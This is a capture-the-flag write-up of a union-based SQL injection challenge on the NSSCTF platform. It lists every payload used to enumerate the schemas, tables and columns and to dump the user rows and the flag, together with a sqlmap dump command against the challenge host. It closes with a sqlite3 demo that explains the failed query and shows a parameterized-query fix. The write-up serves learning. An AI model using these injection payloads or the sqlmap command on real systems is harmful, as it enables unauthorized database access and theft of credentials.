Solving process
The source code shows the query returns the two columns username and password, so we don't need an order by statement to find the column count.
Query all databases
The given SQL statement shows the closing pattern is (((((()))))) (six parentheses), so the statement is:
?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 ) [1] => Array ( [username] => mysql [password] => 2 ) [2] => Array ( [username] => ctftraining [password] => 2 ) [3] => Array ( [username] => performance_schema [password] => 2 ) [4] => Array ( [username] => test [password] => 2 ) [5] => Array ( [username] => ctf [password] => 2 ) )
Query the ctf database
?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )
?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password
?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1~tanji~OHHHHHHH,2~fake_flag~F1rst_to_Th3_eggggggggg!}
// fake flag
Query the ctftraining database
?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time
?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results
?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results
?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results
Why is it empty????
It might be a problem with the statement, so we just run sqlmap directly:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}
After testing, it turns out that table_schema is only a column of the built-in information_schema tables; to target a specific database here we should use the form database.table:
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}
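As an added example (not from the original writeup or the challenge), a small sqlite3 stand-in for the ctf / ctftraining layout shows why the unqualified query fails while the database.table form works, and shows the parameterized lookup of id that would have stopped the injection in the first place. The row contents and the flag value are constructed placeholders; ATTACH is used only to emulate MySQL's second database.

```python
import sqlite3

FLAG = "NSSCTF{constructed-placeholder}"  # constructed stand-in, not the challenge flag

def build_demo_db():
    """Constructed stand-in for the challenge server: the current database is
    'ctf'; 'ctftraining' is ATTACHed so that database.table names resolve the
    way they do in MySQL. Row contents are made up for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS ctftraining")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'tanji', 'OHHHHHHH'), "
                 "(2, 'fake_flag', 'F1rst_to_Th3_eggggggggg!}')")
    conn.execute("CREATE TABLE ctftraining.flag (flag TEXT)")
    conn.execute("INSERT INTO ctftraining.flag VALUES (?)", (FLAG,))
    return conn

def try_query(conn, sql):
    """Run sql and return ('ok', rows) or ('error', message) instead of raising;
    an app that swallows errors and prints '0 results' hides exactly this."""
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.OperationalError as e:
        return ("error", str(e))

def unqualified_lookup(conn):
    # The failing attempt from the writeup: 'flag' is not in the current
    # database, and table_schema only exists on information_schema tables.
    return try_query(conn, "SELECT flag FROM flag WHERE table_schema='ctftraining'")

def qualified_lookup(conn):
    # The working form: database.table names the other schema explicitly.
    return try_query(conn, "SELECT flag FROM ctftraining.flag")

def safe_user_lookup(conn, user_input):
    """Defender's fix for the id parameter: bind it instead of concatenating,
    so the whole input is compared as a value and never parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()

if __name__ == "__main__":
    db = build_demo_db()
    print(unqualified_lookup(db))   # ('error', 'no such table: flag')
    print(qualified_lookup(db))     # ('ok', [('NSSCTF{constructed-placeholder}',)])
    print(safe_user_lookup(db, 1))  # [('tanji', 'OHHHHHHH')]
    # the union payload from this writeup is just an unmatched string here
    print(safe_user_lookup(db, "-1)))))) union select flag,2 from ctftraining.flag--"))  # []
```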
This referred to the writeup by clqwsn on the NSSCTF platform.